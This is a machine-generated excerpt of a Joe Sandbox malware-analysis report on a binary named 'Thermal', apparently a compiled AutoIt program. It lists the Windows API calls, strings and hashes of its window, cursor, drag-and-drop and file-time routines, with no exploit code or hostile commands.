                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                • API String ID: 699586101-1459072770
                                                • Opcode ID: 8d51871c5e103420d5a636a6d2f1e8cb80329425e7c2de1ef47622ddf8e4130c
                                                • Instruction ID: 681c75ecb3f1c49e2e9afba99724d5e57a7f5741ff28ba11de3903ff5608d24e
                                                • Opcode Fuzzy Hash: 8d51871c5e103420d5a636a6d2f1e8cb80329425e7c2de1ef47622ddf8e4130c
                                                • Instruction Fuzzy Hash: DC41E172600215FBEF10B764EC4AEBF777CEF41710F00405AF918E6292EB7D9A0296A5
                                                APIs
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00772C8C
                                                • GetSystemMetrics.USER32(00000007), ref: 00772C94
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00772CBF
                                                • GetSystemMetrics.USER32(00000008), ref: 00772CC7
                                                • GetSystemMetrics.USER32(00000004), ref: 00772CEC
                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00772D09
                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00772D19
                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00772D4C
                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00772D60
                                                • GetClientRect.USER32(00000000,000000FF), ref: 00772D7E
                                                • GetStockObject.GDI32(00000011), ref: 00772D9A
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00772DA5
                                                  • Part of subcall function 00772714: GetCursorPos.USER32(?), ref: 00772727
                                                  • Part of subcall function 00772714: ScreenToClient.USER32(008377B0,?), ref: 00772744
                                                  • Part of subcall function 00772714: GetAsyncKeyState.USER32(00000001), ref: 00772769
                                                  • Part of subcall function 00772714: GetAsyncKeyState.USER32(00000002), ref: 00772777
                                                • SetTimer.USER32(00000000,00000000,00000028,007713C7), ref: 00772DCC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                • String ID: AutoIt v3 GUI
                                                • API String ID: 1458621304-248962490
                                                • Opcode ID: 4f91ebc2ea92fd53adcd6533de50e3b9583f42dd47f0e44015812f28244b3572
                                                • Instruction ID: 4e046da53a99827d67d8c7f9dd942bdd7fc8de36a49d2315b0e96daa4e94d638
                                                • Opcode Fuzzy Hash: 4f91ebc2ea92fd53adcd6533de50e3b9583f42dd47f0e44015812f28244b3572
                                                • Instruction Fuzzy Hash: A3B17E7160020AEFDF15DFA8CC59BAD7BA4FB48350F108629FA19A7290DB78E841CF54
                                                APIs
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                • GetForegroundWindow.USER32(00800980,?,?,?,?,?), ref: 007904E3
                                                • IsWindow.USER32(?), ref: 007C66BB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$Foreground_memmove
                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                • API String ID: 3828923867-1919597938
                                                • Opcode ID: ec7d7eaf220005177e2776d5dca15ff1559e36d36f976d88c6b8079fd0afb3e6
                                                • Instruction ID: 5fd78dc8f32545ef0dae35a1d24f750954a3e082e3052813a16e23273b0b6de4
                                                • Opcode Fuzzy Hash: ec7d7eaf220005177e2776d5dca15ff1559e36d36f976d88c6b8079fd0afb3e6
                                                • Instruction Fuzzy Hash: 6AD1A570104202DFCB08EF60D885EAABBB5FF54344F504A1DF495975A2DB38E999CB92
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 007F44AC
                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007F456C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharMessageSendUpper
                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                • API String ID: 3974292440-719923060
                                                • Opcode ID: e31177ce1aa3a9c60afb007b0068c3ef06f57bcc26900d6a928201a6b7aa4c05
                                                • Instruction ID: aa74f8a79a00e0c7d2df8a7125ca77286b3af2ec988cb49538cafcbe6c5dfb53
                                                • Opcode Fuzzy Hash: e31177ce1aa3a9c60afb007b0068c3ef06f57bcc26900d6a928201a6b7aa4c05
                                                • Instruction Fuzzy Hash: 00A16C30214215DFCB14EF60C855A7AB3A5FF85354F10896CFA969B392DB38EC49CB91
                                                APIs
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 007E56E1
                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 007E56EC
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 007E56F7
                                                • LoadCursorW.USER32(00000000,00007F03), ref: 007E5702
                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 007E570D
                                                • LoadCursorW.USER32(00000000,00007F01), ref: 007E5718
                                                • LoadCursorW.USER32(00000000,00007F81), ref: 007E5723
                                                • LoadCursorW.USER32(00000000,00007F88), ref: 007E572E
                                                • LoadCursorW.USER32(00000000,00007F80), ref: 007E5739
                                                • LoadCursorW.USER32(00000000,00007F86), ref: 007E5744
                                                • LoadCursorW.USER32(00000000,00007F83), ref: 007E574F
                                                • LoadCursorW.USER32(00000000,00007F85), ref: 007E575A
                                                • LoadCursorW.USER32(00000000,00007F82), ref: 007E5765
                                                • LoadCursorW.USER32(00000000,00007F84), ref: 007E5770
                                                • LoadCursorW.USER32(00000000,00007F04), ref: 007E577B
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 007E5786
                                                • GetCursorInfo.USER32(?), ref: 007E5796
                                                • GetLastError.KERNEL32(00000001,00000000), ref: 007E57C1
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Cursor$Load$ErrorInfoLast
                                                • String ID:
                                                • API String ID: 3215588206-0
                                                • Opcode ID: fc222f43c88111d9730461d650a3054658b91c25b48231a3567c339ebd31c096
                                                • Instruction ID: 23ef72e37f68feba2323e8bd7b82903b82013540eb6bfdf02b31e495c2988dfd
                                                • Opcode Fuzzy Hash: fc222f43c88111d9730461d650a3054658b91c25b48231a3567c339ebd31c096
                                                • Instruction Fuzzy Hash: 80415370E04319AADB109FB68C49D6EFEF8EF55B54B10452FE509E7290DAB8A400CF91
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000100), ref: 007CB17B
                                                • __swprintf.LIBCMT ref: 007CB21C
                                                • _wcscmp.LIBCMT ref: 007CB22F
                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007CB284
                                                • _wcscmp.LIBCMT ref: 007CB2C0
                                                • GetClassNameW.USER32(?,?,00000400), ref: 007CB2F7
                                                • GetDlgCtrlID.USER32(?), ref: 007CB349
                                                • GetWindowRect.USER32(?,?), ref: 007CB37F
                                                • GetParent.USER32(?), ref: 007CB39D
                                                • ScreenToClient.USER32(00000000), ref: 007CB3A4
                                                • GetClassNameW.USER32(?,?,00000100), ref: 007CB41E
                                                • _wcscmp.LIBCMT ref: 007CB432
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 007CB458
                                                • _wcscmp.LIBCMT ref: 007CB46C
                                                  • Part of subcall function 0079385C: _iswctype.LIBCMT ref: 00793864
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                • String ID: %s%u
                                                • API String ID: 3744389584-679674701
                                                • Opcode ID: f6ffad6e972a4924e6be39a51069ee9f9ecaaf3f15c7774b320c664bfd1cfa30
                                                • Instruction ID: 3b62c603966ae03cb115a87d787289cf65f64671039a85cb070b4219c21b275d
                                                • Opcode Fuzzy Hash: f6ffad6e972a4924e6be39a51069ee9f9ecaaf3f15c7774b320c664bfd1cfa30
                                                • Instruction Fuzzy Hash: FFA1E171204346EBDB18DF60C886FAAB7E8FF44350F10461DF999C2191DB38EA55CBA1
                                                APIs
                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 007CBAB1
                                                • _wcscmp.LIBCMT ref: 007CBAC2
                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 007CBAEA
                                                • CharUpperBuffW.USER32(?,00000000), ref: 007CBB07
                                                • _wcscmp.LIBCMT ref: 007CBB25
                                                • _wcsstr.LIBCMT ref: 007CBB36
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 007CBB6E
                                                • _wcscmp.LIBCMT ref: 007CBB7E
                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 007CBBA5
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 007CBBEE
                                                • _wcscmp.LIBCMT ref: 007CBBFE
                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 007CBC26
                                                • GetWindowRect.USER32(00000004,?), ref: 007CBC8F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                • String ID: @$ThumbnailClass
                                                • API String ID: 1788623398-1539354611
                                                • Opcode ID: c08c5a6a31463452ee376096eca47eeb0566b486b1ebb2671d59acc34e553676
                                                • Instruction ID: 5eb2a3589362b678dffd100a8fe12f9052d4084c1d760c7ed0950a407dd79ff3
                                                • Opcode Fuzzy Hash: c08c5a6a31463452ee376096eca47eeb0566b486b1ebb2671d59acc34e553676
                                                • Instruction Fuzzy Hash: 8C819E710043099BDB14DF64D886FAA77E8FF44314F04856DFD8A9A096DB38ED4ACB61
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                • API String ID: 1038674560-1810252412
                                                • Opcode ID: 898d6127db741256aea2c926b4ab7a6f8ba877ca1e7e5a2c521d95211891feda
                                                • Instruction ID: a13a08e4becea7eca87676cbbb977e2c690bd3c01da6e4b04b0cfe91e2f6d423
                                                • Opcode Fuzzy Hash: 898d6127db741256aea2c926b4ab7a6f8ba877ca1e7e5a2c521d95211891feda
                                                • Instruction Fuzzy Hash: C131C230684215EBCB08FA50ED47FAD73A8AF20750FA0012DF551B11D1EF6DBE048656
                                                APIs
                                                • LoadIconW.USER32(00000063), ref: 007CCBAA
                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007CCBBC
                                                • SetWindowTextW.USER32(?,?), ref: 007CCBD3
                                                • GetDlgItem.USER32(?,000003EA), ref: 007CCBE8
                                                • SetWindowTextW.USER32(00000000,?), ref: 007CCBEE
                                                • GetDlgItem.USER32(?,000003E9), ref: 007CCBFE
                                                • SetWindowTextW.USER32(00000000,?), ref: 007CCC04
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007CCC25
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007CCC3F
                                                • GetWindowRect.USER32(?,?), ref: 007CCC48
                                                • SetWindowTextW.USER32(?,?), ref: 007CCCB3
                                                • GetDesktopWindow.USER32 ref: 007CCCB9
                                                • GetWindowRect.USER32(00000000), ref: 007CCCC0
                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 007CCD0C
                                                • GetClientRect.USER32(?,?), ref: 007CCD19
                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 007CCD3E
                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007CCD69
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                • String ID:
                                                • API String ID: 3869813825-0
                                                • Opcode ID: 450f8487c759e33080898960fb923ea9ae2a5544ed1ebf663c9aa97928dd55f1
                                                • Instruction ID: a8d2d431c5770a436a186426f4d03463ac7f049f9bac59df5078a84a76ee4508
                                                • Opcode Fuzzy Hash: 450f8487c759e33080898960fb923ea9ae2a5544ed1ebf663c9aa97928dd55f1
                                                • Instruction Fuzzy Hash: F8515D70900709EFDB219FA8CE8AF6EBBB5FF44705F00491CE55AA25A0DB79A914CF50
                                                APIs
                                                • _memset.LIBCMT ref: 007FA87E
                                                • DestroyWindow.USER32(00000000,?), ref: 007FA8F8
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007FA972
                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007FA994
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007FA9A7
                                                • DestroyWindow.USER32(00000000), ref: 007FA9C9
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00770000,00000000), ref: 007FAA00
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007FAA19
                                                • GetDesktopWindow.USER32 ref: 007FAA32
                                                • GetWindowRect.USER32(00000000), ref: 007FAA39
                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007FAA51
                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007FAA69
                                                  • Part of subcall function 007729AB: GetWindowLongW.USER32(?,000000EB), ref: 007729BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                • String ID: 0$tooltips_class32
                                                • API String ID: 1297703922-3619404913
                                                • Opcode ID: 8a10233b4010c92ea8f453682d345aad2165d839b46a0f911446552b748c3c9f
                                                • Instruction ID: b3972d50ff303b140d1e54c5a74cc89cd2a8c22c3c324524e8a9903451be0838
                                                • Opcode Fuzzy Hash: 8a10233b4010c92ea8f453682d345aad2165d839b46a0f911446552b748c3c9f
                                                • Instruction Fuzzy Hash: 5C7189B1150208AFD721CF28C849F7A77E9FB88300F04492DFA89973A1D779E916DB56
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • DragQueryPoint.SHELL32(?,?), ref: 007FCCCF
                                                  • Part of subcall function 007FB1A9: ClientToScreen.USER32(?,?), ref: 007FB1D2
                                                  • Part of subcall function 007FB1A9: GetWindowRect.USER32(?,?), ref: 007FB248
                                                  • Part of subcall function 007FB1A9: PtInRect.USER32(?,?,007FC6BC), ref: 007FB258
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007FCD38
                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007FCD43
                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007FCD66
                                                • _wcscat.LIBCMT ref: 007FCD96
                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007FCDAD
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007FCDC6
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 007FCDDD
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 007FCDFF
                                                • DragFinish.SHELL32(?), ref: 007FCE06
                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007FCEF9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                • API String ID: 169749273-3440237614
                                                • Opcode ID: 2eb98d924064187a34612e0efa504deba756e83832751e88e79d3aff4539e761
                                                • Instruction ID: c2664d9e90ed52d02c3245a94a1196d44b8fafc9ea3b83b769d949577db39923
                                                • Opcode Fuzzy Hash: 2eb98d924064187a34612e0efa504deba756e83832751e88e79d3aff4539e761
                                                • Instruction Fuzzy Hash: 37617F71108304AFC711EF50DC89E6FBBE8FF84350F400A2DF6A5922A1DB759A49CB52
                                                APIs
                                                • VariantInit.OLEAUT32(00000000), ref: 007D831A
                                                • VariantCopy.OLEAUT32(00000000,?), ref: 007D8323
                                                • VariantClear.OLEAUT32(00000000), ref: 007D832F
                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007D841D
                                                • __swprintf.LIBCMT ref: 007D844D
                                                • VarR8FromDec.OLEAUT32(?,?), ref: 007D8479
                                                • VariantInit.OLEAUT32(?), ref: 007D852A
                                                • SysFreeString.OLEAUT32(?), ref: 007D85BE
                                                • VariantClear.OLEAUT32(?), ref: 007D8618
                                                • VariantClear.OLEAUT32(?), ref: 007D8627
                                                • VariantInit.OLEAUT32(00000000), ref: 007D8665
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                • API String ID: 3730832054-3931177956
                                                • Opcode ID: 6678bb529fad0b9d82dae0da4e17da9e4dc6d64f6ce050f4991cc1c2b8eef958
                                                • Instruction ID: a83e50969b77b4d089c47d2ecf2fba027d3547b4b808e179b8bd19f6f456892c
                                                • Opcode Fuzzy Hash: 6678bb529fad0b9d82dae0da4e17da9e4dc6d64f6ce050f4991cc1c2b8eef958
                                                • Instruction Fuzzy Hash: 9CD1D171604515EBDBA09F69D888B6EB7B4FF04B00F188557E419AB381DF38ED40DBA2
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 007F4A61
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F4AAC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharMessageSendUpper
                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                • API String ID: 3974292440-4258414348
                                                • Opcode ID: ac496718d02e2cf59f870744930a61241445243b0e6f34d01b9813eefbdc8db1
                                                • Instruction ID: 03e60bb308e52ad6f9044c1e2e313743c000c1c9e2c9137d6ef84b9491149c0b
                                                • Opcode Fuzzy Hash: ac496718d02e2cf59f870744930a61241445243b0e6f34d01b9813eefbdc8db1
                                                • Instruction Fuzzy Hash: 51918970200715DFCB14EF20C855A7AB7A1BF94354F10885CFA965B3A2CB38ED4ACB92
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 007DE31F
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 007DE32F
                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007DE33B
                                                • __wsplitpath.LIBCMT ref: 007DE399
                                                • _wcscat.LIBCMT ref: 007DE3B1
                                                • _wcscat.LIBCMT ref: 007DE3C3
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007DE3D8
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DE3EC
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DE41E
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DE43F
                                                • _wcscpy.LIBCMT ref: 007DE44B
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007DE48A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                • String ID: *.*
                                                • API String ID: 3566783562-438819550
                                                • Opcode ID: 702e8acddc4ab1acc41cb96e0a9c5294cb76a21a2ad181262061aeda234cbd7f
